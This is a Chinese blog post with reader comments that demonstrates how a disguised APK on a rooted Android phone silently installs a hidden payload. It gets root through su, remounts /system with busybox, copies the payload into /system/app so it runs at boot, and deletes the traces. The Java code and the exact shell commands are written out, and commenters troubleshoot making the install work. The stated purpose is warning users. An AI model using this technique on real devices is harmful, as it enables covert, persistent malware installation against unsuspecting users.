android手机root后的安全问题（一） -

su1216

浏览: 670942 次
性别:
来自: 北京

最近访客更多访客>>

于自水

ldn4869

leimingchao

mcikevin

博主相关

博客

微博

相册

留言

关于我

博客专栏

: 深入入门正则表达式（jav...
浏览量：71915

: android手机的安全问...
浏览量：128760

文章分类

社区版块

存档分类

android手机root后的安全问题（一）

博客分类：

android

android root 病毒风险安全

前提：你有一部已经root的android手机，并且手机中有busybox和superuser

导读：本文介绍一种简单的病毒以及如何“防御”。

写本博客的原因是：有无数用户觉得root没有什么风险，或者风险不会降临到自己头上。这里告诉大家，其实风险就在身边！

这里讲的内容其实对于大多数开发者都不是什么新鲜的事情了，使用的技术也非常一般和普遍。

虽然大家都知道可以这样这样，但是还是随意下载软件，不加小心，就会掉入陷阱。

有些人觉得，只要我下载软件的时候检查软件所申请的权限就好了，其实没有那么简单。

我们来看看如果一个软件，获得了一次root权限，那么它可以作些什么呢？

好吧，我们先来一次“静默安装”！

原理很简单，基本上相当于把apk push到手机里面，两个选择

data/app

system/app

如果我是病毒软件，我肯定选择push到system/app

我们需要制作两个apk，一个是真正目的的（病毒，real.apk），另一个是假的壳子（fake.apk）

首先先制作real.apk，我们只是用来测试，所以这个apk没有什么实际内容（为了节省大家时间，real.apk已经上传）。

real.apk里有一个receiver，用来监听开机的广播

android.intent.action.BOOT_COMPLETED

还有一个activity，没有什么实质内容，然后编译出apk，待用。

下面来制作壳子

新建一个android工程，将之前的real.apk复制到assets目录下

然后新建一个activity来测试

这个壳子的很简单，它只负责把真实的应用安装到用户手机中，我们再细分一下，首先，将文件assets/real.apk提取出来，放到自己的私有目录中，在本例子中的目录为data/data/com.example.fake/files，这一步是不需要任何权限的

prepareButton.setOnClickListener(new View.OnClickListener() {
	public void onClick(View v) {
		File dataFolder = getFilesDir();
                File jar = new File(dataFolder.getAbsolutePath() + "/real.apk");
                copyFile("real.apk", jar, mResources);
	}
});

其中copFile函数见附件（就是一个简单的io读写操作），这里只给出伪代码

InputStream myInput = null;
try
    myInput = resources.getAssets().open(filePath);
    ……
catch
……
finally
……

第一步已经完成了，下一步请求root权限，然后将real.apk恶意安装给用户。

这里需要使用到busybox，命令如下

busybox mount -o remount,rw /system
busybox cp /data/data/com.example.fake/files/real.apk /system/app/real.apk
busybox rm /data/data/com.example.fake/files/real.apk

之所以使用busybox，是因为手机里面可能没有mount、cp、rm等命令（我的手机里面就没有）

当然superuser需要同意你使用root权限

至此，你的入侵行为已经全部完成！

installButton.setOnClickListener(new View.OnClickListener() {
		public void onClick(View v) {
			String packageName = getPackageName();
			String[] commands = {"busybox mount -o remount,rw /system",
                                 "busybox cp /data/data/" + packageName + "/files/real.apk /system/app/real.apk",
                                 "busybox rm /data/data/" + packageName + "/files/real.apk"};
			Process process = null;
			DataOutputStream dataOutputStream = null;

			try {
				process = Runtime.getRuntime().exec("su");
				dataOutputStream = new DataOutputStream(process.getOutputStream());
				int length = commands.length;
				for (int i = 0; i < length; i++) {
					Log.e(TAG, "commands[" + i + "]:" + commands[i]);
					dataOutputStream.writeBytes(commands[i] + "\n");
				}
				dataOutputStream.writeBytes("exit\n");
				dataOutputStream.flush();
				process.waitFor();
			} catch (Exception e) {
				Log.e(TAG, "copy fail", e);
			} finally {
				try {
					if (dataOutputStream != null) {
						dataOutputStream.close();
					}
					process.destroy();
				} catch (Exception e) {
				}
			}
		}
	});
}

重启手机之后，real.apk就能工作了，它会接收到开机广播

如果你嵌入了更恶劣的代码，比如偷发短信，窃取邮件，那么用户也是很难察觉的

real.apk在settings中会显示在系统应用中，用户不太会怀疑，即使怀疑了，他们也不敢轻易卸载！谁让他们自己随意刷rom呢，每个rom集成的软件都不一样。

如何防御？！

我不知道如何防御，最简单的办法就是，解压你来路不明的apk文件，看看assets文件下有没有什么可疑文件。当然，病毒可能会去掉或者修改文件名的后缀！

我手机中安装了卡巴斯基免费版，很可惜，它没有查出病毒（即使你的real.apk嵌入更恶意的代码）

大家可以试试其他杀毒软件，比如……希望大家能给个反馈结果

请大家不要用root的手机随意下载软件，更不要以任何借口制造任何病毒！

android手机root后的安全问题（一）

android手机root后的安全问题（二）

android手机root后的安全问题（三）

android手机root后的安全问题（四）

android安全问题（一）静音拍照与被拍

android安全问题（二）程序锁

android安全问题（三）钓鱼程序

转贴请保留以下链接

本人blog地址

http://su1216.iteye.com/

http://blog.csdn.net/su1216/

Real.zip (482.3 KB)
下载次数: 17

8
顶

6
踩

分享到：

android手机root后的安全问题（二） | android OutOfMemory时抓取heap快照

2012-08-31 12:23
浏览 21483
评论(29)
分类:移动开发
查看更多

29 楼 heikefangxianceshi 2014-08-13

小三将军写道

楼主，我想问下你给的Real.tar.gz是什么东西，为什么解压后在data/data中找到apk文件

楼主是放你放在你的资源文件里的.你仔细看文章啊

28 楼 heikefangxianceshi 2014-08-13

这个程序运行的前提是手机root,但你的手机怎么root的呢?用一件root大师这样的工具吗??

27 楼 heikefangxianceshi 2014-07-15

赞一个.......

26 楼小三将军 2013-06-12

小三将军写道

楼主，我想问下你给的Real.tar.gz是什么东西，为什么解压后在data/data中找到apk文件

还有一个问题就是将real.apk放到/system/app文件夹下面就可以了吗，不需要进行其他的操作？还是可以理解为放到system/app文件夹下的文件开机的时候就会自己调用？

新手，请指导下，谢谢。

25 楼小三将军 2013-06-12

楼主，我想问下你给的Real.tar.gz是什么东西，为什么解压后在data/data中找到apk文件

24 楼 su1216 2013-03-01

kaedeno1 写道

su1216 写道

kaedeno1 写道

APK文件放在SD卡可以安装但是放在system/app下就是解析包错误
后台输出:

03-01 14:33:23.999: D/PackageParser(798): Scanning package: /system/app/SilentInstalled.apk
03-01 14:33:24.009: W/zipro(798): Unable to open zip '/system/app/SilentInstalled.apk': Permission denied
03-01 14:33:24.009: D/asset(798): failed to open Zip archive '/system/app/SilentInstalled.apk'
03-01 14:33:24.089: W/PackageParser(798): Unable to read AndroidManifest.xml of /system/app/SilentInstalled.apk
03-01 14:33:24.089: W/PackageParser(798): java.io.FileNotFoundException: AndroidManifest.xml
03-01 14:33:24.089: W/PackageParser(798): at android.content.res.AssetManager.openXmlAssetNative(Native Method)
03-01 14:33:24.089: W/PackageParser(798): at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:524)
03-01 14:33:24.089: W/PackageParser(798): at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:492)
03-01 14:33:24.089: W/PackageParser(798): at android.content.pm.PackageParser.parsePackage(PackageParser.java:402)
03-01 14:33:24.089: W/PackageParser(798): at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2746)
03-01 14:33:24.089: W/PackageParser(798): at com.android.server.PackageManagerService.access$2000(PackageManagerService.java:145)
03-01 14:33:24.089: W/PackageParser(798): at com.android.server.PackageManagerService$AppDirObserver.onEvent(PackageManagerService.java:4721)
03-01 14:33:24.089: W/PackageParser(798): at android.os.FileObserver$ObserverThread.onEvent(FileObserver.java:125)
03-01 14:33:24.089: W/PackageParser(798): at android.os.FileObserver$ObserverThread.observe(Native Method)
03-01 14:33:24.089: W/PackageParser(798): at android.os.FileObserver$ObserverThread.run(FileObserver.java:88)
03-01 14:33:24.129: W/InputManagerService(798): [unbindCurrentClientLocked] Disable input method client.
03-01 14:33:24.129: W/InputManagerService(798): [startInputLocked] Enable input method client.

求解决

Unable to open zip '/system/app/SilentInstalled.apk': Permission denied
ll一下system/app一下，看看这个应用和其他应用有啥区别

我找了很长时间了也没找到解决的方案连问题所在都模模糊糊的

是不是没有相应的.odex文件? 这个文件又怎么生成?

和这没啥关系

23 楼 kaedeno1 2013-03-01

kaedeno1 写道

su1216 写道

kaedeno1 写道

求解决

Unable to open zip '/system/app/SilentInstalled.apk': Permission denied
ll一下system/app一下，看看这个应用和其他应用有啥区别

我找了很长时间了也没找到解决的方案连问题所在都模模糊糊的

是不是没有相应的.odex文件? 这个文件又怎么生成?

22 楼 kaedeno1 2013-03-01

su1216 写道

kaedeno1 写道

求解决

Unable to open zip '/system/app/SilentInstalled.apk': Permission denied
ll一下system/app一下，看看这个应用和其他应用有啥区别

我找了很长时间了也没找到解决的方案连问题所在都模模糊糊的

21 楼 su1216 2013-03-01

kaedeno1 写道

求解决

Unable to open zip '/system/app/SilentInstalled.apk': Permission denied
ll一下system/app一下，看看这个应用和其他应用有啥区别

20 楼 kaedeno1 2013-03-01

求解决

19 楼 kaedeno1 2013-03-01

03-01 14:33:24.089: W/PackageParser(798): Unable to read AndroidManifest.xml of /system/app/SilentInstalled.apk
03-01 14:33:24.089: W/PackageParser(798): java.io.FileNotFoundException: AndroidManifest.xml
03-01 14:33:24.089: W/PackageParser(798): at android.content.res.AssetManager.openXmlAssetNative(Native Method)
03-01 14:33:24.089: W/PackageParser(798): at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:524)
03-01 14:33:24.089: W/PackageParser(798): at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:492)
03-01 14:33:24.089: W/PackageParser(798): at android.content.pm.PackageParser.parsePackage(PackageParser.java:402)
03-01 14:33:24.089: W/PackageParser(798): at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2746)
03-01 14:33:24.089: W/PackageParser(798): at com.android.server.PackageManagerService.access$2000(PackageManagerService.java:145)
03-01 14:33:24.089: W/PackageParser(798): at com.android.server.PackageManagerService$AppDirObserver.onEvent(PackageManagerService.java:4721)
03-01 14:33:24.089: W/PackageParser(798): at android.os.FileObserver$ObserverThread.onEvent(FileObserver.java:125)
03-01 14:33:24.089: W/PackageParser(798): at android.os.FileObserver$ObserverThread.observe(Native Method)
03-01 14:33:24.089: W/PackageParser(798): at android.os.FileObserver$ObserverThread.run(FileObserver.java:88)
03-01 14:33:24.129: W/InputManagerService(798): [unbindCurrentClientLocked] Disable input method client.
03-01 14:33:24.129: W/InputManagerService(798): [startInputLocked] Enable input method client.

18 楼凌寒_微雨 2013-02-28

su1216 写道

凌寒_微雨写道

代码实现已经将real放到system/app 下了，但是real没有安装上，怎么回事

已经解决了

解析包的错误

我给的apk问题？？

不是

17 楼 su1216 2013-02-27

凌寒_微雨写道

代码实现已经将real放到system/app 下了，但是real没有安装上，怎么回事

已经解决了

解析包的错误

我给的apk问题？？

16 楼凌寒_微雨 2013-02-27

凌寒_微雨写道

代码实现已经将real放到system/app 下了，但是real没有安装上，怎么回事

已经解决了

解析包的错误

15 楼 su1216 2013-02-26

凌寒_微雨写道

代码实现已经将real放到system/app 下了，但是real没有安装上，怎么回事

已经解决了

什么问题，如何解决的？

14 楼凌寒_微雨 2013-02-26

凌寒_微雨写道

代码实现已经将real放到system/app 下了，但是real没有安装上，怎么回事

已经解决了

13 楼 su1216 2013-02-26

凌寒_微雨写道

代码实现已经将real放到system/app 下了，但是real没有安装上，怎么回事

data/data下面ls不到com.example.real这个包？

12 楼凌寒_微雨 2013-02-26

代码实现已经将real放到system/app 下了，但是real没有安装上，怎么回事

11 楼 su1216 2013-02-26

凌寒_微雨写道

将程序放到system/app 下就自动安装了？不需要恢复出厂设置吗？

是的
恢复出厂设置做什么？

10 楼凌寒_微雨 2013-02-25

将程序放到system/app 下就自动安装了？不需要恢复出厂设置吗？

发表评论

您还没有登录,请您登录后再发表评论

最近访客更多访客>>

博主相关

博客专栏

文章分类

社区版块

存档分类

最新评论

android手机root后的安全问题（一）

评论

发表评论

相关推荐

最近访客 更多访客>>

博主相关

博客专栏

文章分类

社区版块

存档分类

最新评论

android手机root后的安全问题 （一）

评论

发表评论

相关推荐

android 第三方app截图

android截图事件监听

android widget（桌面小部件）实现

acra简析

android版本差异

android系统提供的常用命令行工具

标示与掩码

通过蓝牙调试（穿戴设备app） - 开发文档翻译

打包穿戴设备app - 开发文档翻译

弧形进度条（动画版）

使用canvas与Paint在View中居中绘制文字

android 关于提高第三方app的service优先级

android <application> 开发文档翻译

android中各种log的抓取

android多语言项目中字符串的移植（bash工具）

android 高效显示Bitmap - 开发文档翻译

android 在你的UI中显示Bitmap - 开发文档翻译

android 管理Bitmap内存 - 开发文档翻译

android 缓存Bitmap - 开发文档翻译

android 在UI线程之外处理Bitmap - 开发文档翻译

最近访客更多访客>>

android手机root后的安全问题（一）